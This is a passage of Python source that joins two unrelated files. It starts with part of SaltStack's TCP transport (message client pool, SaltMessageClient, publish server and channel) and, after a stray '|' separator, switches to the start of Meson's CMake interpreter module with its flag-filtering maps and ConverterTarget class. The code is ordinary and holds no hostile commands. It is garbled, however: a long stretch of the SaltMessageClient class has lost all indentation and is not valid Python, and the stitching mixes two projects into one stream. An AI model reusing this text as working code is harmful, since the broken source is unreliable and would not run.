        a multiprocessing queue.
        Since the queue is shared amongst workers, only one worker will handle
        a given connection.
        '''
        def __init__(self, socket_queue, message_handler, *args, **kwargs):
            super(LoadBalancerWorker, self).__init__(
                message_handler, *args, **kwargs)
            self.socket_queue = socket_queue

            # Consume accepted sockets from the shared queue in the background.
            # NOTE(review): this thread is non-daemon and only exits on
            # KeyboardInterrupt/SystemExit -- confirm shutdown behavior.
            t = threading.Thread(target=self.socket_queue_thread)
            t.start()

        def socket_queue_thread(self):
            '''
            Blockingly pull (socket, address) pairs from the queue and hand
            each one to the tornado server on its IO loop.
            '''
            try:
                while True:
                    client_socket, address = self.socket_queue.get(True, None)

                    # 'self.io_loop' initialized in super class
                    # 'tornado.tcpserver.TCPServer'.
                    # 'self._handle_connection' defined in same super class.
                    self.io_loop.spawn_callback(
                        self._handle_connection, client_socket, address)
            except (KeyboardInterrupt, SystemExit):
                pass
class TCPClientKeepAlive(tornado.tcpclient.TCPClient):
    '''
    Override _create_stream() in TCPClient to enable keep alive support.
    '''
    def __init__(self, opts, resolver=None, io_loop=None):
        # opts carries the tcp_keepalive* settings consumed by
        # _set_tcp_keepalive() when each stream is created.
        self.opts = opts
        super(TCPClientKeepAlive, self).__init__(
            resolver=resolver, io_loop=io_loop)

    def _create_stream(self, max_buffer_size, af, addr, **kwargs):  # pylint: disable=unused-argument
        '''
        Override _create_stream() in TCPClient.

        Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
        Due to this, use **kwargs to swallow these and any future
        kwargs to maintain compatibility.
        '''
        # Always connect in plaintext; we'll convert to ssl if necessary
        # after one connection has completed.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        _set_tcp_keepalive(sock, self.opts)
        stream = tornado.iostream.IOStream(
            sock,
            io_loop=self.io_loop,
            max_buffer_size=max_buffer_size)
        return stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
    '''
    Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
    '''
    def __init__(self, opts, args=None, kwargs=None):
        super(SaltMessageClientPool, self).__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)

    def __del__(self):
        # Best-effort cleanup on garbage collection.
        self.close()

    def close(self):
        '''
        Close every pooled client and drop the references.
        '''
        for message_client in self.message_clients:
            message_client.close()
        self.message_clients = []

    @tornado.gen.coroutine
    def connect(self):
        '''
        Start all pooled clients connecting in parallel; resolves once
        every client has connected.
        '''
        futures = []
        for message_client in self.message_clients:
            futures.append(message_client.connect())
        for future in futures:
            yield future
        raise tornado.gen.Return(None)

    def on_recv(self, *args, **kwargs):
        '''
        Register the receive callback on every pooled client.
        '''
        for message_client in self.message_clients:
            message_client.on_recv(*args, **kwargs)

    def send(self, *args, **kwargs):
        '''
        Send on the least-loaded client (shortest send queue).
        '''
        # min() is O(n); the previous sorted(...)[0] was O(n log n) and
        # built a throwaway list. Both pick the first minimal element.
        message_client = min(self.message_clients, key=lambda x: len(x.send_queue))
        return message_client.send(*args, **kwargs)

    def write_to_stream(self, *args, **kwargs):
        '''
        Write raw framed bytes on the least-loaded client's stream.
        '''
        message_client = min(self.message_clients, key=lambda x: len(x.send_queue))
        return message_client._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient(object):
'''
Low-level message sending client
'''
def __init__(self, opts, host, port, io_loop=None, resolver=None,
             connect_callback=None, disconnect_callback=None,
             source_ip=None, source_port=None):
    '''
    :param opts: salt config dict (also passed to TCPClientKeepAlive for
        the tcp_keepalive* settings)
    :param host: master host to connect to
    :param port: master port to connect to
    :param io_loop: tornado IO loop to run on (defaults to the current one)
    :param resolver: optional tornado resolver for the TCP client
    :param connect_callback: invoked after each successful (re)connect
    :param disconnect_callback: invoked when the connection drops
    :param source_ip: optional local address to bind outgoing connections to
    :param source_port: optional local port to bind outgoing connections to
    '''
    self.opts = opts
    self.host = host
    self.port = port
    self.source_ip = source_ip
    self.source_port = source_port
    self.connect_callback = connect_callback
    self.disconnect_callback = disconnect_callback

    self.io_loop = io_loop or tornado.ioloop.IOLoop.current()

    self._tcp_client = TCPClientKeepAlive(
        opts, io_loop=self.io_loop, resolver=resolver)

    self._mid = 1
    self._max_messages = int((1 << 31) - 2)  # number of IDs before we wrap

    # TODO: max queue size
    self.send_queue = []  # queue of messages to be sent
    self.send_future_map = {}  # mapping of request_id -> Future
    self.send_timeout_map = {}  # request_id -> timeout_callback

    self._read_until_future = None
    self._on_recv = None
    self._closing = False
    # Kick off the initial connection attempt immediately.
    self._connecting_future = self.connect()
    self._stream_return_future = tornado.concurrent.Future()
    self.io_loop.spawn_callback(self._stream_return)
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, '_stream') and not self._stream.closed():
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exc_info()
if (not self._stream_return_future.done() and
self.io_loop != tornado.ioloop.IOLoop.current(
instance=False)):
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.async.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
orig_loop = tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
try:
self.io_loop.add_future(
self._stream_return_future,
lambda future: self.io_loop.stop()
)
self.io_loop.start()
finally:
orig_loop.make_current()
self._tcp_client.close()
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
def __del__(self):
self.close()
def connect(self):
'''
Ask for this client to reconnect to the origin
'''
if hasattr(self, '_connecting_future') and not self._connecting_future.done():
future = self._connecting_future
else:
future = tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@tornado.gen.coroutine
def _connect(self):
'''
Try to connect for the rest of time!
'''
while True:
if self._closing:
break
try:
if (self.source_ip or self.source_port) and tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
self._stream = yield self._tcp_client.connect(self.host,
self.port,
ssl_options=self.opts.get('ssl'),
source_ip=self.source_ip,
source_port=self.source_port)
else:
if self.source_ip or self.source_port:
log.warning('If you need a certain source IP/port, consider upgrading Tornado >= 4.5')
self._stream = yield self._tcp_client.connect(self.host,
self.port,
ssl_options=self.opts.get('ssl'))
self._connecting_future.set_result(True)
break
except Exception as e:
yield tornado.gen.sleep(1) # TODO: backoff
#self._connecting_future.set_exception(e)
@tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done() or
self._connecting_future.result() is not True):
yield self._connecting_future
unpacker = msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(4096, partial=True)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
body = framed_msg['body']
message_id = header.get('mid')
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error('Got response for message_id %s that we are not tracking', message_id)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s:%s closed, unable to recv', self.host, self.port)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if 'detect_mode' in self.opts:
log.info('There was an error trying to use TCP transport; '
'attempting to fallback to another transport')
else:
raise SaltClientError
except Exception as e:
log.error('Exception parsing response', exc_info=True)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@tornado.gen.coroutine
def _stream_send(self):
while not self._connecting_future.done() or self._connecting_future.result() is not True:
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, lets fail this send, and make sure we
# attempt to reconnect
except tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception('Unable to find available messageid')
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
'''
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(
SaltReqTimeoutError('Message timed out')
)
def send(self, msg, timeout=None, callback=None, raw=False):
'''
Send given message, and return a future
'''
message_id = self._message_id()
header = {'mid': message_id}
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message_id)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append((message_id, salt.transport.frame.frame_msg(msg, header=header)))
return future
class Subscriber(object):
    '''
    Client object for use with the TCP publisher server

    Wraps one connected subscriber stream together with its peer address
    and (once validated) its minion id.
    '''
    def __init__(self, stream, address):
        self.stream = stream
        self.address = address
        self._closing = False
        self._read_until_future = None
        self.id_ = None  # set after the minion's id/token is verified

    def close(self):
        '''Close the underlying stream exactly once.'''
        if self._closing:
            return
        self._closing = True
        if not self.stream.closed():
            self.stream.close()
        pending_read = self._read_until_future
        if pending_read is not None:
            # Retrieve the exception from the dangling read future so
            # tornado does not log '[ERROR] Future exception was never
            # retrieved: StreamClosedError' — the reader is always
            # blocked on the next read when the stream goes away.
            pending_read.exc_info()

    def __del__(self):
        self.close()
class PubServer(tornado.tcpserver.TCPServer, object):
    '''
    TCP publisher

    Accepts subscriber (minion) connections, validates their id/token via
    AESFuncs, tracks presence, and fans published payloads out to either
    all connected clients or a targeted topic list.
    '''
    def __init__(self, opts, io_loop=None):
        super(PubServer, self).__init__(io_loop=io_loop, ssl_options=opts.get('ssl'))
        self.opts = opts
        self._closing = False
        self.clients = set()  # all connected Subscriber objects
        self.aes_funcs = salt.master.AESFuncs(self.opts)
        self.present = {}  # minion id -> set of Subscriber objects
        self.presence_events = False
        if self.opts.get('presence_events', False):
            tcp_only = True
            for transport, _ in iter_transport_opts(self.opts):
                if transport != 'tcp':
                    tcp_only = False
            if tcp_only:
                # Only when the transport is TCP only, the presence events will
                # be handled here. Otherwise, it will be handled in the
                # 'Maintenance' process.
                self.presence_events = True

        if self.presence_events:
            self.event = salt.utils.event.get_event(
                'master',
                opts=self.opts,
                listen=False
            )

    def close(self):
        # Only flips the flag; the read loops in _stream_read observe it
        # and wind down on their own.
        if self._closing:
            return
        self._closing = True

    def __del__(self):
        self.close()

    def _add_client_present(self, client):
        '''Record ``client`` as present and, if enabled, fire presence events.'''
        id_ = client.id_
        if id_ in self.present:
            # More than one stream per id can happen after an unclean
            # disconnect followed by a reconnect.
            clients = self.present[id_]
            clients.add(client)
        else:
            self.present[id_] = set([client])
            if self.presence_events:
                data = {'new': [id_],
                        'lost': []}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('change', 'presence')
                )
                data = {'present': list(self.present.keys())}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('present', 'presence')
                )

    def _remove_client_present(self, client):
        '''Drop ``client`` from presence tracking; fire events on last stream.'''
        id_ = client.id_
        if id_ is None or id_ not in self.present:
            # This is possible if _remove_client_present() is invoked
            # before the minion's id is validated.
            return

        clients = self.present[id_]
        if client not in clients:
            # Since _remove_client_present() is potentially called from
            # _stream_read() and/or publish_payload(), it is possible for
            # it to be called twice, in which case we will get here.
            # This is not an abnormal case, so no logging is required.
            return

        clients.remove(client)
        if len(clients) == 0:
            del self.present[id_]
            if self.presence_events:
                data = {'new': [],
                        'lost': [id_]}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('change', 'presence')
                )
                data = {'present': list(self.present.keys())}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('present', 'presence')
                )

    @tornado.gen.coroutine
    def _stream_read(self, client):
        '''Per-subscriber read loop: authenticate the minion id.

        Incoming frames must be 'aes'-encrypted; the decrypted load's
        id/token pair is verified before the client is marked present.
        '''
        unpacker = msgpack.Unpacker()
        while not self._closing:
            try:
                client._read_until_future = client.stream.read_bytes(4096, partial=True)
                wire_bytes = yield client._read_until_future
                unpacker.feed(wire_bytes)
                for framed_msg in unpacker:
                    if six.PY3:
                        framed_msg = salt.transport.frame.decode_embedded_strs(
                            framed_msg
                        )
                    body = framed_msg['body']
                    if body['enc'] != 'aes':
                        # We only accept 'aes' encoded messages for 'id'
                        continue
                    crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
                    load = crypticle.loads(body['load'])
                    if six.PY3:
                        load = salt.transport.frame.decode_embedded_strs(load)
                    if not self.aes_funcs.verify_minion(load['id'], load['tok']):
                        continue
                    client.id_ = load['id']
                    self._add_client_present(client)
            except tornado.iostream.StreamClosedError as e:
                log.debug('tcp stream to %s closed, unable to recv', client.address)
                client.close()
                self._remove_client_present(client)
                self.clients.discard(client)
                break
            except Exception as e:
                # Keep the loop alive on malformed frames.
                log.error('Exception parsing response', exc_info=True)
                continue

    def handle_stream(self, stream, address):
        '''TCPServer hook: wrap each new connection in a Subscriber.'''
        log.trace('Subscriber at %s connected', address)
        client = Subscriber(stream, address)
        self.clients.add(client)
        self.io_loop.spawn_callback(self._stream_read, client)

    # TODO: ACK the publish through IPC
    @tornado.gen.coroutine
    def publish_payload(self, package, _):
        '''Frame ``package['payload']`` and write it to subscribers.

        With a 'topic_lst' the payload goes only to the listed minion ids;
        otherwise it is broadcast to every connected client.  Clients
        whose stream is already closed are pruned afterwards.
        '''
        log.debug('TCP PubServer sending payload: %s', package)
        payload = salt.transport.frame.frame_msg(package['payload'])

        to_remove = []
        if 'topic_lst' in package:
            topic_lst = package['topic_lst']
            for topic in topic_lst:
                if topic in self.present:
                    # This will rarely be a list of more than 1 item. It will
                    # be more than 1 item if the minion disconnects from the
                    # master in an unclean manner (eg cable yank), then
                    # restarts and the master is yet to detect the disconnect
                    # via TCP keep-alive.
                    for client in self.present[topic]:
                        try:
                            # Write the packed str
                            f = client.stream.write(payload)
                            self.io_loop.add_future(f, lambda f: True)
                        except tornado.iostream.StreamClosedError:
                            to_remove.append(client)
                else:
                    log.debug('Publish target %s not connected', topic)
        else:
            for client in self.clients:
                try:
                    # Write the packed str
                    f = client.stream.write(payload)
                    self.io_loop.add_future(f, lambda f: True)
                except tornado.iostream.StreamClosedError:
                    to_remove.append(client)
        for client in to_remove:
            log.debug('Subscriber at %s has disconnected from publisher', client.address)
            client.close()
            self._remove_client_present(client)
            self.clients.discard(client)
        log.trace('TCP PubServer finished publishing payload')
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
    '''Master-side TCP publish channel.

    Runs a PubServer in a forked daemon process (``_publish_daemon``) and
    feeds it publish payloads over a Salt IPC pull socket.  ``publish()``
    is called in the master process and pushes over that IPC link.
    '''
    # TODO: opts!
    # Based on default used in tornado.netutil.bind_sockets()
    backlog = 128

    def __init__(self, opts):
        self.opts = opts
        self.serial = salt.payload.Serial(self.opts)  # TODO: in init?
        self.io_loop = None

    # __setstate__/__getstate__ let the channel be pickled across the
    # multiprocessing fork while carrying the shared AES secrets along.
    def __setstate__(self, state):
        salt.master.SMaster.secrets = state['secrets']
        self.__init__(state['opts'])

    def __getstate__(self):
        return {'opts': self.opts,
                'secrets': salt.master.SMaster.secrets}

    def _publish_daemon(self, log_queue=None):
        '''
        Bind to the interface specified in the configuration file

        Runs forever in a child process: serves PubServer on the publish
        port and an IPC pull socket whose payload handler is
        ``pub_server.publish_payload``.
        '''
        salt.utils.process.appendproctitle(self.__class__.__name__)

        if log_queue is not None:
            salt.log.setup.set_multiprocessing_logging_queue(log_queue)
            salt.log.setup.setup_multiprocessing_logging(log_queue)

        # Check if io_loop was set outside
        if self.io_loop is None:
            self.io_loop = tornado.ioloop.IOLoop.current()

        # Spin up the publisher
        pub_server = PubServer(self.opts, io_loop=self.io_loop)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        _set_tcp_keepalive(sock, self.opts)
        sock.setblocking(0)
        sock.bind((self.opts['interface'], int(self.opts['publish_port'])))
        sock.listen(self.backlog)
        # pub_server will take ownership of the socket
        pub_server.add_socket(sock)

        # Set up Salt IPC server
        if self.opts.get('ipc_mode', '') == 'tcp':
            # In tcp ipc_mode the "uri" is just a local port number.
            pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
        else:
            pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')

        pull_sock = salt.transport.ipc.IPCMessageServer(
            pull_uri,
            io_loop=self.io_loop,
            payload_handler=pub_server.publish_payload,
        )

        # Securely create socket
        # (umask 0o177 -> the ipc socket file is created 0600)
        log.info('Starting the Salt Puller on %s', pull_uri)
        old_umask = os.umask(0o177)
        try:
            pull_sock.start()
        finally:
            os.umask(old_umask)

        # run forever
        try:
            self.io_loop.start()
        except (KeyboardInterrupt, SystemExit):
            salt.log.setup.shutdown_multiprocessing_logging()

    def pre_fork(self, process_manager):
        '''
        Do anything necessary pre-fork. Since this is on the master side this will
        primarily be used to create IPC channels and create our daemon process to
        do the actual publishing
        '''
        kwargs = {}
        if salt.utils.platform.is_windows():
            kwargs['log_queue'] = (
                salt.log.setup.get_multiprocessing_logging_queue()
            )

        process_manager.add_process(self._publish_daemon, kwargs=kwargs)

    def publish(self, load):
        '''
        Publish "load" to minions

        Encrypts (and optionally signs) the load, then ships it to the
        publisher daemon over the IPC pull socket.  For list targeting a
        'topic_lst' is attached so the daemon can send selectively.
        '''
        payload = {'enc': 'aes'}

        crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
        payload['load'] = crypticle.dumps(load)
        if self.opts['sign_pub_messages']:
            master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
            log.debug("Signing data packet")
            payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
        # Use the Salt IPC server
        if self.opts.get('ipc_mode', '') == 'tcp':
            pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
        else:
            pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
        # TODO: switch to the actual async interface
        #pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
        pub_sock = salt.utils.async.SyncWrapper(
            salt.transport.ipc.IPCMessageClient,
            (pull_uri,)
        )
        pub_sock.connect()

        int_payload = {'payload': self.serial.dumps(payload)}

        # add some targeting stuff for lists only (for now)
        if load['tgt_type'] == 'list':
            int_payload['topic_lst'] = load['tgt']

        # Send it over IPC!
        pub_sock.send(int_payload)
|
interpreter.py | # Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This class contains the basic functionality needed to run any interpreter
# or an interpreter-based tool.
from .common import CMakeException
from .client import CMakeClient, RequestCMakeInputs, RequestConfigure, RequestCompute, RequestCodeModel, CMakeTarget
from .executor import CMakeExecutor
from .traceparser import CMakeTraceParser, CMakeGeneratorTarget
from .. import mlog
from ..environment import Environment
from ..mesonlib import MachineChoice
from ..compilers.compilers import lang_suffixes, header_suffixes, obj_suffixes, is_header
from subprocess import Popen, PIPE
from typing import Any, List, Dict, Optional, TYPE_CHECKING
from threading import Thread
import os, re
from ..mparser import (
Token,
BaseNode,
CodeBlockNode,
FunctionNode,
ArrayNode,
ArgumentNode,
AssignmentNode,
BooleanNode,
StringNode,
IdNode,
IndexNode,
MethodNode,
NumberNode,
)
if TYPE_CHECKING:
from ..build import Build
from ..backend.backends import Backend
# Map meson backend names to the CMake generator that emits compatible
# build files.
backend_generator_map = {
    'ninja': 'Ninja',
    'xcode': 'Xcode',
    'vs2010': 'Visual Studio 10 2010',
    # NOTE(review): 'vs2015' maps to the 2017 generator below — looks
    # intentional (use the newer generator for both), but confirm.
    'vs2015': 'Visual Studio 15 2017',
    'vs2017': 'Visual Studio 15 2017',
    'vs2019': 'Visual Studio 16 2019',
}

# meson language id -> the name CMake uses for the same language
# (e.g. in CMAKE_<LANG>_COMPILER variables).
language_map = {
    'c': 'C',
    'cpp': 'CXX',
    'cuda': 'CUDA',
    'cs': 'CSharp',
    'java': 'Java',
    'fortran': 'Fortran',
    'swift': 'Swift',
}

# CMake target type -> meson build-target function to emit.
# OBJECT_LIBRARY is lowered to a static_library (meson has no direct
# object-library equivalent); INTERFACE_LIBRARY becomes header-only.
target_type_map = {
    'STATIC_LIBRARY': 'static_library',
    'MODULE_LIBRARY': 'shared_module',
    'SHARED_LIBRARY': 'shared_library',
    'EXECUTABLE': 'executable',
    'OBJECT_LIBRARY': 'static_library',
    'INTERFACE_LIBRARY': 'header_only'
}

# Target types whose properties only exist in the CMake trace output.
target_type_requires_trace = ['INTERFACE_LIBRARY']

# CMake target types that have no meson equivalent and are dropped.
skip_targets = ['UTILITY']

# MSVC compiler flags stripped from imported targets: warning levels,
# optimization levels and runtime checks are controlled by meson itself.
blacklist_compiler_flags = [
    '/W1', '/W2', '/W3', '/W4', '/Wall',
    '/O1', '/O2', '/Ob', '/Od', '/Og', '/Oi', '/Os', '/Ot', '/Ox', '/Oy', '/Ob0',
    '/RTC1', '/RTCc', '/RTCs', '/RTCu'
]

# Linker flags meson manages itself (machine type, debug info, incremental
# linking) — removed case-insensitively in postprocess().
blacklist_link_flags = [
    '/machine:x64', '/machine:x86', '/machine:arm', '/machine:ebc',
    '/debug', '/debug:fastlink', '/debug:full', '/debug:none',
    '/incremental',
]

# clang-cl passes some compile-style flags through to the link line.
blacklist_clang_cl_link_flags = ['/GR', '/EHsc', '/MDd', '/Zi', '/RTC1']

# Default Windows system libraries that the toolchain links implicitly.
blacklist_link_libs = [
    'kernel32.lib',
    'user32.lib',
    'gdi32.lib',
    'winspool.lib',
    'shell32.lib',
    'ole32.lib',
    'oleaut32.lib',
    'uuid.lib',
    'comdlg32.lib',
    'advapi32.lib'
]
# Utility functions to generate local keys
def _target_key(tgt_name: str) -> str:
return '__tgt_{}__'.format(tgt_name)
def _generated_file_key(fname: str) -> str:
return '__gen_{}__'.format(os.path.basename(fname))
class ConverterTarget:
    '''Converts one CMake codemodel target into meson-consumable data.

    __init__ ingests the raw CMakeTarget; postprocess() then normalizes
    paths, standards flags, link libraries and blacklisted options.
    '''
    # Reverse lookup: lowered CMake language name -> meson language id.
    lang_cmake_to_meson = {val.lower(): key for key, val in language_map.items()}

    def __init__(self, target: CMakeTarget, env: Environment):
        self.env = env
        self.artifacts = target.artifacts
        self.src_dir = target.src_dir
        self.build_dir = target.build_dir
        self.name = target.name
        self.full_name = target.full_name
        self.type = target.type
        self.install = target.install
        self.install_dir = ''
        self.link_libraries = target.link_libraries
        self.link_flags = target.link_flags + target.link_lang_flags

        if target.install_paths:
            self.install_dir = target.install_paths[0]

        self.languages = []
        self.sources = []
        self.generated = []
        self.includes = []
        self.link_with = []
        self.object_libs = []
        self.compile_opts = {}  # meson language id -> list of compile args
        self.public_compile_opts = []
        self.pie = False

        # Project default override options (c_std, cpp_std, etc.)
        self.override_options = []

        for i in target.files:
            # Determine the meson language
            lang = ConverterTarget.lang_cmake_to_meson.get(i.language.lower(), 'c')
            if lang not in self.languages:
                self.languages += [lang]
            if lang not in self.compile_opts:
                self.compile_opts[lang] = []

            # Add arguments, but avoid duplicates
            args = i.flags
            args += ['-D{}'.format(x) for x in i.defines]
            self.compile_opts[lang] += [x for x in args if x not in self.compile_opts[lang]]

            # Handle include directories
            self.includes += [x for x in i.includes if x not in self.includes]

            # Add sources to the right array
            if i.is_generated:
                self.generated += i.sources
            else:
                self.sources += i.sources

    def __repr__(self) -> str:
        return '<{}: {}>'.format(self.__class__.__name__, self.name)

    # Matches -std=/--std=//std:/... flags so the standard can be moved
    # into meson override options instead.
    std_regex = re.compile(r'([-]{1,2}std=|/std:v?|[-]{1,2}std:)(.*)')

    def postprocess(self, output_target_map: dict, root_src_dir: str, subdir: str, install_prefix: str, trace: CMakeTraceParser) -> None:
        '''Normalize the raw CMake data for meson consumption.

        - moves -std flags into override_options and detects PIC/PIE
        - pulls INTERFACE_* properties from the trace for header-only targets
        - resolves link libraries against known targets
        - filters unsupported file suffixes and rewrites paths relative
          to the meson source/build layout
        - strips blacklisted compiler/linker flags and system libs
        '''
        # Detect setting the C and C++ standard
        for i in ['c', 'cpp']:
            if i not in self.compile_opts:
                continue

            temp = []
            for j in self.compile_opts[i]:
                m = ConverterTarget.std_regex.match(j)
                if m:
                    self.override_options += ['{}_std={}'.format(i, m.group(2))]
                elif j in ['-fPIC', '-fpic', '-fPIE', '-fpie']:
                    self.pie = True
                elif j in blacklist_compiler_flags:
                    pass
                else:
                    temp += [j]

            self.compile_opts[i] = temp

        # Make sure to force enable -fPIC for OBJECT libraries
        if self.type.upper() == 'OBJECT_LIBRARY':
            self.pie = True

        # Use the CMake trace, if required
        if self.type.upper() in target_type_requires_trace:
            if self.name in trace.targets:
                props = trace.targets[self.name].properties

                self.includes += props.get('INTERFACE_INCLUDE_DIRECTORIES', [])
                self.public_compile_opts += props.get('INTERFACE_COMPILE_DEFINITIONS', [])
                self.public_compile_opts += props.get('INTERFACE_COMPILE_OPTIONS', [])
                self.link_flags += props.get('INTERFACE_LINK_OPTIONS', [])
            else:
                mlog.warning('CMake: Target', mlog.bold(self.name), 'not found in CMake trace. This can lead to build errors')

        # Fix link libraries
        temp = []
        for i in self.link_libraries:
            # Let meson handle this arcane magic
            if ',-rpath,' in i:
                continue
            if not os.path.isabs(i):
                basename = os.path.basename(i)
                if basename in output_target_map:
                    self.link_with += [output_target_map[basename]]
                    continue

            temp += [i]
        self.link_libraries = temp

        # Filter out files that are not supported by the language
        supported = list(header_suffixes) + list(obj_suffixes)
        for i in self.languages:
            supported += list(lang_suffixes[i])
        supported = ['.{}'.format(x) for x in supported]
        self.sources = [x for x in self.sources if any([x.endswith(y) for y in supported])]
        self.generated = [x for x in self.generated if any([x.endswith(y) for y in supported])]

        # Make paths relative
        def rel_path(x: str, is_header: bool, is_generated: bool) -> Optional[str]:
            # Returns a path relative to the meson layout, or None when
            # the file should be dropped entirely.
            if not os.path.isabs(x):
                x = os.path.normpath(os.path.join(self.src_dir, x))
            if not os.path.exists(x) and not any([x.endswith(y) for y in obj_suffixes]) and not is_generated:
                mlog.warning('CMake: path', mlog.bold(x), 'does not exist. Ignoring. This can lead to build errors')
                return None
            if os.path.isabs(x) and os.path.commonpath([x, self.env.get_build_dir()]) == self.env.get_build_dir():
                if is_header:
                    return os.path.relpath(x, os.path.join(self.env.get_build_dir(), subdir))
                else:
                    return os.path.relpath(x, root_src_dir)
            if os.path.isabs(x) and os.path.commonpath([x, root_src_dir]) == root_src_dir:
                return os.path.relpath(x, root_src_dir)
            return x

        def custom_target(x: str):
            # Replace a generated file path with a reference into the
            # ConverterCustomTarget that produces it, when one is known.
            key = _generated_file_key(x)
            if key in output_target_map:
                ctgt = output_target_map[key]
                assert(isinstance(ctgt, ConverterCustomTarget))
                ref = ctgt.get_ref(x)
                assert(isinstance(ref, CustomTargetReference) and ref.valid())
                return ref
            return x

        build_dir_rel = os.path.relpath(self.build_dir, os.path.join(self.env.get_build_dir(), subdir))
        self.includes = list(set([rel_path(x, True, False) for x in set(self.includes)] + [build_dir_rel]))
        self.sources = [rel_path(x, False, False) for x in self.sources]
        self.generated = [rel_path(x, False, True) for x in self.generated]

        # Resolve custom targets
        self.generated = [custom_target(x) for x in self.generated]

        # Remove delete entries
        self.includes = [x for x in self.includes if x is not None]
        self.sources = [x for x in self.sources if x is not None]
